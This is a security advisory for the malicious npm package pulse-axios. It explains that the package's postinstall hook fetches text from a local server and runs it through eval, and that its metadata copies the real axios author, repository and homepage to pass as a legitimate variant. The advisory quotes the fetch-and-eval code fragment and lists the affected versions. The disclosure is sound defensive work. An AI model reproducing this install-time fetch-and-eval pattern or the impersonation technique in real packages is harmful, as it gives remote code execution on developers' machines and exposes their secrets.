npm · Malicious package advisory
Malwarepulse-axios
MAL-2026-4651
Malicious code in pulse-axios (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99)
pulse-axios@1.16.1 declares a postinstall hook (`node./lib/core/eval.js`) that on `npm install` issues `fetch('http://localhost:3000/download/data')`, reads the response body as text, and passes it to `eval` inside an async IIFE: `await eval(\`(async () => {\n${datab2}\n})();\`)`. Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time — including any local attacker process, a co-installed malicious package's helper, or a developer-staging payload server — execute with the installer's privileges. The package additionally impersonates the legitimate `axios` package: `name: pulse-axios`, description claims to be "a faster and better version of axios", `author` is set to `Matt Zabriskie` (the real axios maintainer), `repository.url` points to `https://github.com/axios/axios.git`, and `homepage` is `https://axios-http.com`. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.
Compromised versions (3)
- 1.17.2
- 1.17.1
- 1.16.1
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.